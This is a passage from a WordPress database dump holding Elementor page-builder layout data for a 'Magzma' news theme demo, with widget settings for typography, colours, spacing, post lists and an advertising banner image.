"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#000000\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":12},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"category_font_weight\":\"700\",\"category_font_weight_tablet\":\"600\",\"category_font_weight_mobile\":\"600\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"19\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-3\"},{\"id\":\"ddyguyh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"Recent Post\",\"title_size\":\"h6\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#000000\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"cgofvkr\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list_3_post_setting\":\"\",\"posts_per_page\":\"6\",\"offset\":\"\",\"category\":[],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-3\",\"section_magzma_post_control\":\"\",\"vertical_position\":{\"unit\":\"px\",\"size\":0},\"vertical_position_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_mobile\":{\"unit\":\"px\",\"size\":0},\"hide_image\":\"on\",\"width\":\"300\",\"height\":\"200\",\"use_icon\":\"\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#000000\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":12},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"category_font_weight\":\"700\",\"category_font_weight_tablet\":\"600\",\"category_font_weight_mobile\":\"600\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"20\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-3\"},{\"id\":\"4ot2x74\",\"elType\":\"widget\",\"settings\":{\"section_magzma_advertising\":\"\",\"advertising_type\":\"image_and_url\",\"image\":{\"url\":\"http:\\/\\/demo7.magzma.com\\/wp-content\\/uploads\\/sites\\/8\\/2017\\/01\\/banner-main-news380x600.jpg\",\"id\":334},\"image_ad_size\":\"full\",\"link_to\":\"none\",\"link\":{\"is_external\":\"\",\"url\":\"\"},\"ad_script\":\"\",\"sticky_ads\":\"no\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-advertising-builder\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(478,357,'_elementor_version','0.4'),(484,359,'_wp_page_template','default'),(485,360,'_wp_page_template','default'),(486,360,'use_wrapper_space','1'),(487,360,'_use_wrapper_space','field_5858a5302ab1a'),(488,360,'hide_title','1'),(489,360,'_hide_title','field_5629b0afab2ef'),(490,360,'_elementor_edit_mode','builder'),(491,360,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_m